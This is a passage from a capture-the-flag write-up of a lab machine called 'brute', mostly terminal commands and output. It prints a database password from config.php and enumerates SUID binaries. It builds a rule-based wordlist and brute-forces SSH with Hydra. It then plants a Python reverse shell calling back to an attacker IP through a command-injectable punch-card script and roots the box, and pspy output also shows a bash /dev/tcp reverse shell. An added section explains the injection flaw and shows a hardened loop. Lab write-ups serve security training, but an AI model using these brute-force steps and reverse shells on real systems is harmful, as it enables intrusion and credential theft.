This command is similar to the previous one. It sets the TERM environment variable to "xterm-256color", indicating that the terminal being used is an xterm terminal with support for 256 colors.
A 256-color terminal can display more colors than the traditional 8-color terminal, providing more visual options and better color representation. This is useful in applications such as text editors and terminal-based games that need advanced color support.
It's also important to note that some applications may require the TERM variable to be set to a specific value in order to function properly. Setting the TERM variable to the correct value ensures that these applications will work as expected.
www-data@brute:/var/www/html$ ls
ls
config.php index.php logout.php welcome.php
www-data@brute:/var/www/html$ cat config.php
cat config.php
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'adrian');
define('DB_PASSWORD', 'P@sswr0d789!');
define('DB_NAME', 'website');
/* Attempt to connect to MySQL database */
$mysqli = new mysqli(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
// Check connection
if($mysqli === false){
die("ERROR: Could not connect. " . $mysqli->connect_error);
}
?>
www-data@brute:/var/www/html$ find / -perm -4000 2>/dev/null | xargs ls -lah
find / -perm -4000 2>/dev/null | xargs ls -lah
-rwsr-xr-x 1 root root 43K Sep 16 2020 /snap/core18/2253/bin/mount
-rwsr-xr-x 1 root root 63K Jun 28 2019 /snap/core18/2253/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/2253/bin/su
-rwsr-xr-x 1 root root 27K Sep 16 2020 /snap/core18/2253/bin/umount
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/2253/usr/bin/chfn
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/2253/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/2253/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22 2019 /snap/core18/2253/usr/bin/newgrp
-rwsr-xr-x 1 root root 59K Mar 22 2019 /snap/core18/2253/usr/bin/passwd
-rwsr-xr-x 1 root root 146K Jan 19 2021 /snap/core18/2253/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42K Jun 11 2020 /snap/core18/2253/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Aug 11 2021 /snap/core18/2253/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43K Sep 16 2020 /snap/core18/2344/bin/mount
-rwsr-xr-x 1 root root 63K Jun 28 2019 /snap/core18/2344/bin/ping
-rwsr-xr-x 1 root root 44K Jan 25 2022 /snap/core18/2344/bin/su
-rwsr-xr-x 1 root root 27K Sep 16 2020 /snap/core18/2344/bin/umount
-rwsr-xr-x 1 root root 75K Jan 25 2022 /snap/core18/2344/usr/bin/chfn
-rwsr-xr-x 1 root root 44K Jan 25 2022 /snap/core18/2344/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Jan 25 2022 /snap/core18/2344/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Jan 25 2022 /snap/core18/2344/usr/bin/newgrp
-rwsr-xr-x 1 root root 59K Jan 25 2022 /snap/core18/2344/usr/bin/passwd
-rwsr-xr-x 1 root root 146K Jan 19 2021 /snap/core18/2344/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42K Jun 11 2020 /snap/core18/2344/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Mar 3 2020 /snap/core18/2344/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 84K Jul 14 2021 /snap/core20/1242/usr/bin/chfn
-rwsr-xr-x 1 root root 52K Jul 14 2021 /snap/core20/1242/usr/bin/chsh
-rwsr-xr-x 1 root root 87K Jul 14 2021 /snap/core20/1242/usr/bin/gpasswd
-rwsr-xr-x 1 root root 55K Jul 21 2020 /snap/core20/1242/usr/bin/mount
-rwsr-xr-x 1 root root 44K Jul 14 2021 /snap/core20/1242/usr/bin/newgrp
-rwsr-xr-x 1 root root 67K Jul 14 2021 /snap/core20/1242/usr/bin/passwd
-rwsr-xr-x 1 root root 67K Jul 21 2020 /snap/core20/1242/usr/bin/su
-rwsr-xr-x 1 root root 163K Jan 19 2021 /snap/core20/1242/usr/bin/sudo
-rwsr-xr-x 1 root root 39K Jul 21 2020 /snap/core20/1242/usr/bin/umount
-rwsr-xr-- 1 root systemd-resolve 51K Jun 11 2020 /snap/core20/1242/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 463K Jul 23 2021 /snap/core20/1242/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 84K Jul 14 2021 /snap/core20/1405/usr/bin/chfn
-rwsr-xr-x 1 root root 52K Jul 14 2021 /snap/core20/1405/usr/bin/chsh
-rwsr-xr-x 1 root root 87K Jul 14 2021 /snap/core20/1405/usr/bin/gpasswd
-rwsr-xr-x 1 root root 55K Feb 7 2022 /snap/core20/1405/usr/bin/mount
-rwsr-xr-x 1 root root 44K Jul 14 2021 /snap/core20/1405/usr/bin/newgrp
-rwsr-xr-x 1 root root 67K Jul 14 2021 /snap/core20/1405/usr/bin/passwd
-rwsr-xr-x 1 root root 67K Feb 7 2022 /snap/core20/1405/usr/bin/su
-rwsr-xr-x 1 root root 163K Jan 19 2021 /snap/core20/1405/usr/bin/sudo
-rwsr-xr-x 1 root root 39K Feb 7 2022 /snap/core20/1405/usr/bin/umount
-rwsr-xr-- 1 root systemd-resolve 51K Jun 11 2020 /snap/core20/1405/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 463K Dec 2 2021 /snap/core20/1405/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 121K Mar 22 2022 /snap/snapd/15314/usr/lib/snapd/snap-confine
-rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at
-rwsr-xr-x 1 root root 84K Jul 14 2021 /usr/bin/chfn
-rwsr-xr-x 1 root root 52K Jul 14 2021 /usr/bin/chsh
-rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 87K Jul 14 2021 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 55K Feb 7 2022 /usr/bin/mount
-rwsr-xr-x 1 root root 44K Jul 14 2021 /usr/bin/newgrp
-rwsr-xr-x 1 root root 67K Jul 14 2021 /usr/bin/passwd
-rwsr-xr-x 1 root root 31K Feb 21 2022 /usr/bin/pkexec
-rwsr-xr-x 1 root root 67K Feb 7 2022 /usr/bin/su
-rwsr-xr-x 1 root root 163K Jan 19 2021 /usr/bin/sudo
-rwsr-xr-x 1 root root 39K Feb 7 2022 /usr/bin/umount
-rwsr-xr-- 1 root messagebus 51K Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 463K Dec 2 2021 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 23K Feb 21 2022 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 140K Feb 23 2022 /usr/lib/snapd/snap-confine
www-data@brute:/home/adrian$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@brute:/home/adrian$ ls -lah
ls -lah
total 48K
drwxr-xr-x 4 adrian adrian 4.0K Apr 5 2022 .
drwxr-xr-x 3 root root 4.0K Oct 19 2021 ..
lrwxrwxrwx 1 adrian adrian 9 Oct 20 2021 .bash_history -> /dev/null
-rw-r--r-- 1 adrian adrian 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 adrian adrian 3.7K Feb 25 2020 .bashrc
drwx------ 2 adrian adrian 4.0K Oct 19 2021 .cache
-rw-r--r-- 1 adrian adrian 807 Feb 25 2020 .profile
-rw-r--r-- 1 adrian adrian 43 Oct 20 2021 .reminder
-rw-rw-r-- 1 adrian adrian 75 Apr 5 2022 .selected_editor
-rw-r--r-- 1 adrian adrian 0 Oct 19 2021 .sudo_as_admin_successful
-rw------- 1 adrian adrian 0 Apr 6 2022 .viminfo
drwxr-xr-x 3 nobody nogroup 4.0K Oct 20 2021 ftp
-rw-r----- 1 adrian adrian 2.1K Jan 13 17:50 punch_in
-rw-r----- 1 root adrian 94 Apr 5 2022 punch_in.sh
-rw-r----- 1 adrian adrian 21 Apr 5 2022 user.txt
www-data@brute:/home/adrian$ cat .bash_history
cat .bash_history
www-data@brute:/home/adrian$ cat .sudo_as_admin_successful
cat .sudo_as_admin_successful
www-data@brute:/home/adrian$ cat .reminder
cat .reminder
Rules:
best of 64
+ exclamation
ettubrute
---
Et tu, Brute? is a Latin phrase supposedly spoken by Julius Caesar at the moment of his assassination. It is used to express an unexpected betrayal. There is no certainty that Caesar said anything at the moment of his death.
---
using hashcat to create a dictionary
┌──(kali㉿kali)-[~/nappy/brutus]
└─$ echo 'ettubrute' > pass.txt
┌──(kali㉿kali)-[~/nappy/brutus]
└─$ echo '$!' > append.txt
┌──(kali㉿kali)-[~/nappy]
└─$ locate best64
/usr/share/hashcat/rules/best64.rule
/usr/share/john/rules/best64.rule
┌──(kali㉿kali)-[~/nappy/brutus]
└─$ hashcat --stdout pass.txt -r /usr/share/hashcat/rules/best64.rule -r append.txt > hashcat_list.txt
┌──(kali㉿kali)-[~/nappy/brutus]
└─$ cat hashcat_list.txt | wc -l
77
┌──(kali㉿kali)-[~/nappy/brutus]
└─$ hydra -l adrian -P hashcat_list.txt 10.10.183.215 ssh -V -t 64
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-13 13:09:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 77 login tries (l:1/p:77), ~2 tries per task
[DATA] attacking ssh://10.10.183.215:22/
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute!" - 1 of 77 [child 0] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "eturbutte!" - 2 of 77 [child 1] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ETTUBRUTE!" - 3 of 77 [child 2] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "Ettubrute!" - 4 of 77 [child 3] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute0!" - 5 of 77 [child 4] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute1!" - 6 of 77 [child 5] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute2!" - 7 of 77 [child 6] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute3!" - 8 of 77 [child 7] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute4!" - 9 of 77 [child 8] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute5!" - 10 of 77 [child 9] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute6!" - 11 of 77 [child 10] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute7!" - 12 of 77 [child 11] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute8!" - 13 of 77 [child 12] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute9!" - 14 of 77 [child 13] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute00!" - 15 of 77 [child 14] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute01!" - 16 of 77 [child 15] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute02!" - 17 of 77 [child 16] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute11!" - 18 of 77 [child 17] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute12!" - 19 of 77 [child 18] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute13!" - 20 of 77 [child 19] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute21!" - 21 of 77 [child 20] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute22!" - 22 of 77 [child 21] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute23!" - 23 of 77 [child 22] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute69!" - 24 of 77 [child 23] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute77!" - 25 of 77 [child 24] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute88!" - 26 of 77 [child 25] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute99!" - 27 of 77 [child 26] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute123!" - 28 of 77 [child 27] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrutee!" - 29 of 77 [child 28] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrutes!" - 30 of 77 [child 29] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubruta!" - 31 of 77 [child 30] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrus!" - 32 of 77 [child 31] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrua!" - 33 of 77 [child 32] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubruer!" - 34 of 77 [child 33] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubruie!" - 35 of 77 [child 34] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubro!" - 36 of 77 [child 35] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubry!" - 37 of 77 [child 36] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubr123!" - 38 of 77 [child 37] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrman!" - 39 of 77 [child 38] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrdog!" - 40 of 77 [child 39] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "1ettubrute!" - 41 of 77 [child 40] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "theettubrute!" - 42 of 77 [child 41] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "dttubrute!" - 43 of 77 [child 42] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "matubrute!" - 44 of 77 [child 43] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute!" - 45 of 77 [child 44] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute!" - 46 of 77 [child 45] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "3ttubrut3!" - 47 of 77 [child 46] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "etubrute!" - 48 of 77 [child 47] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "etbrute!" - 49 of 77 [child 48] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettbrute!" - 50 of 77 [child 49] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "etturute!" - 51 of 77 [child 50] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettb!" - 52 of 77 [child 51] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettub1!" - 53 of 77 [child 52] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrut!" - 54 of 77 [child 53] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubru!" - 55 of 77 [child 54] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubr!" - 56 of 77 [child 55] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrettubr!" - 57 of 77 [child 56] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "etubr!" - 58 of 77 [child 57] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "bsut!" - 59 of 77 [child 58] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "etubrut!" - 60 of 77 [child 59] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubre!" - 61 of 77 [child 60] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "sttubru!" - 62 of 77 [child 61] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "uteettubr!" - 63 of 77 [child 62] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "rute!" - 64 of 77 [child 63] (0/0)
[22][ssh] host: 10.10.183.215 login: adrian password: theettubrute!
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 25 final worker threads did not complete until end.
[ERROR] 25 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-13 13:09:50
adrian:theettubrute!
using john to create a dictionary
"--stdout" is a command line option, it can be used to redirect the standard output of a command to a file or another location.
For example, if you ran the command "ls --stdout > filelist.txt", the output of the "ls" command (which would normally be displayed on the terminal) would be redirected to a file called "filelist.txt".
┌──(kali㉿kali)-[~/nappy/brutus]
└─$ john --rules=best64 --wordlist=pass.txt --stdout > john_list.txt
Using default input encoding: UTF-8
Press 'q' or Ctrl-C to abort, almost any other key for status
75p 0:00:00:00 100.00% (2023-01-13 13:14) 170.4p/s erutee
┌──(kali㉿kali)-[~/nappy/brutus]
└─$ cat john_list.txt | wc -l
75
┌──(kali㉿kali)-[~/nappy/brutus]
└─$ cat john_list.txt | grep the
theettubrute
now adding ! to the list
You can use the sed command to add a string to the end of each line in a file. The following command appends "!" to the end of each line in the file "john_list.txt":
`sed 's/$/!/' john_list.txt > john_list_modified.txt`
This uses sed to match the end of each line (the "$" anchor) and replace it with "!" (the string to add). The modified lines are written to a new file called "john_list_modified.txt".
Note that the original file is not modified; the output goes to the new file, in this case "john_list_modified.txt".
You can also use the -i option to edit the file in place:
`sed -i 's/$/!/' john_list.txt`
This edits john_list.txt directly and adds "!" at the end of each line.
let's do it!
┌──(kali㉿kali)-[~/nappy/brutus]
└─$ sed -i 's/$/!/' john_list.txt
┌──(kali㉿kali)-[~/nappy/brutus]
└─$ cat john_list.txt | grep the
theettubrute!
:)
now log in with ssh
┌──(kali㉿kali)-[~/nappy/brutus]
└─$ ssh adrian@10.10.183.215
The authenticity of host '10.10.183.215 (10.10.183.215)' can't be established.
ED25519 key fingerprint is SHA256:IrziL4jB1v+vS+zEJrCmPDK2Y2e5MG9qqxYh5WIfCSM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.183.215' (ED25519) to the list of known hosts.
adrian@10.10.183.215's password:
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-89-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri 13 Jan 2023 06:19:58 PM UTC
System load: 0.0 Processes: 123
Usage of /: 39.9% of 18.57GB Users logged in: 0
Memory usage: 62% IPv4 address for eth0: 10.10.183.215
Swap usage: 0%
18 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Apr 5 23:46:50 2022 from 10.0.2.26
adrian@brute:~$ cd /home/adrian
adrian@brute:~$ ls
ftp punch_in punch_in.sh user.txt
adrian@brute:~$ cat user.txt
THM{PoI$0n_tH@t_L0g}
adrian@brute:~$ cat punch_in
Punched in at 16:04
Punched in at 16:05
adrian@brute:~$ cat punch_in.sh
#!/bin/bash
/usr/bin/echo 'Punched in at '$(/usr/bin/date +"%H:%M") >> /home/adrian/punch_in
adrian@brute:~/ftp/files$ cat script
#!/bin/sh
while read line;
do
/usr/bin/sh -c "echo $line";
done < /home/adrian/punch_in
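The `script` above is the command-injection sink: each line of punch_in (a file adrian can write) is spliced into a command string for `sh -c`, so backticks or `$(...)` stored in the file are executed by whoever runs the loop. As an added example (not part of the writeup), the same loop beside a version that treats each line as plain data, run against a constructed punch_in file whose payload is a harmless marker instead of the reverse-shell one-liner:

```shell
#!/bin/sh
# Added example, not from the writeup: the punch_in loop from `script`
# beside a hardened version. File name and payload are constructed.

# Vulnerable pattern (as in the page's script): the line is pasted into a
# new command string, so `...` and $(...) stored in the file are expanded
# by the inner shell. The page used /usr/bin/sh; plain sh is used here so
# the demo runs anywhere.
vulnerable_loop() {
    while read line; do
        sh -c "echo $line"
    done < "$1"
}

# Hardened: no second shell. IFS= keeps whitespace, read -r keeps
# backslashes, and printf '%s' prints the line without re-parsing it.
# The `|| [ -n "$line" ]` also handles a last line with no newline.
safe_loop() {
    while IFS= read -r line || [ -n "$line" ]; do
        printf '%s\n' "$line"
    done < "$1"
}

# Builds a constructed punch_in file: one honest line and one line carrying
# a harmless substitution that stands in for the one-liner in .notes.
make_demo_file() {
    f=$(mktemp)
    printf '%s\n' 'Punched in at 16:04' > "$f"
    printf '%s\n' 'Punched in at $(echo INJECTED-BY-SUBSTITUTION)' >> "$f"
    printf '%s' "$f"
}

# Succeeds when the output shows the substitution was executed: the marker
# appears but the literal "$(echo" text that produced it is gone.
substitution_executed() {
    case "$1" in
        *'$(echo'*) return 1 ;;
        *INJECTED-BY-SUBSTITUTION*) return 0 ;;
    esac
    return 1
}

# Number of output lines; both loops should emit one per input line.
count_lines() {
    printf '%s\n' "$1" | wc -l | tr -d ' '
}

demo_file=$(make_demo_file)
echo "--- vulnerable loop (substitution runs) ---"
vulnerable_loop "$demo_file"
echo "--- hardened loop (line printed verbatim) ---"
safe_loop "$demo_file"
rm -f "$demo_file"
```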
adrian@brute:~/ftp/files$ cat .notes
That silly admin
He is such a micro manager, wants me to check in every minute by writing
on my punch card.
He even asked me to write the script for him.
Little does he know, I am planning my revenge.
add this:
`python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.19.103",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'`
┌──(kali㉿kali)-[~/nappy]
└─$ rlwrap nc -lvnp 1337
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.183.215.
Ncat: Connection from 10.10.183.215:57770.
root@brute:~# cat /root/root.txt
cat /root/root.txt
THM{C0mm@nD_Inj3cT1on_4_D@_BruT3}
or
┌──(kali㉿kali)-[~/nappy]
└─$ locate pspy
/home/kali/hackthebox/pspy64s
┌──(kali㉿kali)-[~/nappy]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.183.215 - - [13/Jan/2023 13:47:34] "GET /pspy64s HTTP/1.1" 200 -
adrian@brute:~$ wget http://10.8.19.103:8000/pspy64s
--2023-01-13 18:47:33-- http://10.8.19.103:8000/pspy64s
Connecting to 10.8.19.103:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1156536 (1.1M) [application/octet-stream]
Saving to: ‘pspy64s’
pspy64s 100%[==============================================================>] 1.10M 550KB/s in 2.1s
2023-01-13 18:47:35 (550 KB/s) - ‘pspy64s’ saved [1156536/1156536]
adrian@brute:~$ chmod +x pspy64s
adrian@brute:~$ ./pspy64s
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2023/01/13 18:49:03 CMD: UID=0 PID=95 |
2023/01/13 18:49:03 CMD: UID=0 PID=94 |
2023/01/13 18:49:03 CMD: UID=0 PID=92 |
2023/01/13 18:49:03 CMD: UID=0 PID=91 |
2023/01/13 18:49:03 CMD: UID=0 PID=90 |
2023/01/13 18:49:03 CMD: UID=0 PID=9 |
2023/01/13 18:49:03 CMD: UID=0 PID=89 |
2023/01/13 18:49:03 CMD: UID=0 PID=88 |
2023/01/13 18:49:03 CMD: UID=0 PID=87 |
2023/01/13 18:49:03 CMD: UID=0 PID=86 |
2023/01/13 18:49:03 CMD: UID=0 PID=85 |
2023/01/13 18:49:03 CMD: UID=0 PID=8390 |
2023/01/13 18:49:03 CMD: UID=113 PID=834 | /usr/sbin/mysqld
2023/01/13 18:49:03 CMD: UID=0 PID=83 |
2023/01/13 18:49:03 CMD: UID=0 PID=82 |
2023/01/13 18:49:03 CMD: UID=33 PID=797 | /usr/sbin/apache2 -k start
2023/01/13 18:49:03 CMD: UID=33 PID=796 | /usr/sbin/apache2 -k start
2023/01/13 18:49:03 CMD: UID=33 PID=795 | /usr/sbin/apache2 -k start
2023/01/13 18:49:03 CMD: UID=33 PID=794 | /usr/sbin/apache2 -k start
2023/01/13 18:49:03 CMD: UID=33 PID=790 | /usr/sbin/apache2 -k start
2023/01/13 18:49:03 CMD: UID=0 PID=78 |
2023/01/13 18:49:03 CMD: UID=0 PID=77 |
2023/01/13 18:49:03 CMD: UID=0 PID=766 | /usr/sbin/apache2 -k start
2023/01/13 18:49:03 CMD: UID=0 PID=763 | /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
2023/01/13 18:49:03 CMD: UID=0 PID=76 |
2023/01/13 18:49:03 CMD: UID=0 PID=753 | /usr/bin/ssm-agent-worker
2023/01/13 18:49:03 CMD: UID=0 PID=75 |
2023/01/13 18:49:03 CMD: UID=0 PID=74 |
2023/01/13 18:49:03 CMD: UID=0 PID=734 | /usr/lib/policykit-1/polkitd --no-debug
2023/01/13 18:49:03 CMD: UID=0 PID=73 |
2023/01/13 18:49:03 CMD: UID=0 PID=72 |
2023/01/13 18:49:03 CMD: UID=33 PID=7182 | /bin/bash
2023/01/13 18:49:03 CMD: UID=33 PID=7181 | python3 -c import pty;pty.spawn("/bin/bash")
2023/01/13 18:49:03 CMD: UID=0 PID=71 |
2023/01/13 18:49:03 CMD: UID=33 PID=7072 | bash -i
2023/01/13 18:49:03 CMD: UID=33 PID=7071 | bash -c bash -i >& /dev/tcp/10.8.19.103/4444 0>&1
2023/01/13 18:49:03 CMD: UID=33 PID=7070 | sh -c bash -c 'bash -i >& /dev/tcp/10.8.19.103/4444 0>&1'
2023/01/13 18:49:03 CMD: UID=0 PID=706 | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
2023/01/13 18:49:03 CMD: UID=0 PID=705 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2023/01/13 18:49:03 CMD: UID=0 PID=702 | /sbin/agetty -o -p -- \u --keep-baud 115200,38400,9600 ttyS0 vt220
2023/01/13 18:49:03 CMD: UID=0 PID=70 |
2023/01/13 18:49:03 CMD: UID=0 PID=674 | /usr/sbin/vsftpd /etc/vsftpd.conf
2023/01/13 18:49:03 CMD: UID=0 PID=660 | /usr/sbin/atd -f
2023/01/13 18:49:03 CMD: UID=0 PID=656 | /usr/lib/udisks2/udisksd
2023/01/13 18:49:03 CMD: UID=0 PID=654 | /lib/systemd/systemd-logind
2023/01/13 18:49:03 CMD: UID=0 PID=649 | /usr/lib/snapd/snapd
2023/01/13 18:49:03 CMD: UID=104 PID=639 | /usr/sbin/rsyslogd -n -iNONE
2023/01/13 18:49:03 CMD: UID=0 PID=630 | /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
2023/01/13 18:49:03 CMD: UID=103 PID=605 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2023/01/13 18:49:03 CMD: UID=0 PID=601 | /usr/sbin/cron -f
2023/01/13 18:49:03 CMD: UID=0 PID=6 |
2023/01/13 18:49:03 CMD: UID=0 PID=596 | /usr/bin/amazon-ssm-agent
2023/01/13 18:49:03 CMD: UID=0 PID=595 | /usr/lib/accountsservice/accounts-daemon
2023/01/13 18:49:03 CMD: UID=101 PID=583 | /lib/systemd/systemd-resolved
2023/01/13 18:49:03 CMD: UID=100 PID=579 | /lib/systemd/systemd-networkd
2023/01/13 18:49:03 CMD: UID=102 PID=532 | /lib/systemd/systemd-timesyncd
2023/01/13 18:49:03 CMD: UID=0 PID=515 |
2023/01/13 18:49:03 CMD: UID=0 PID=514 |
2023/01/13 18:49:03 CMD: UID=0 PID=505 |
2023/01/13 18:49:03 CMD: UID=0 PID=503 |
2023/01/13 18:49:03 CMD: UID=0 PID=500 |
2023/01/13 18:49:03 CMD: UID=0 PID=498 |
2023/01/13 18:49:03 CMD: UID=0 PID=496 |
2023/01/13 18:49:03 CMD: UID=0 PID=494 |
2023/01/13 18:49:03 CMD: UID=0 PID=493 |
2023/01/13 18:49:03 CMD: UID=0 PID=484 | /sbin/multipathd -d -s
2023/01/13 18:49:03 CMD: UID=0 PID=483 |
2023/01/13 18:49:03 CMD: UID=0 PID=482 |
2023/01/13 18:49:03 CMD: UID=0 PID=481 |
2023/01/13 18:49:03 CMD: UID=0 PID=480 |
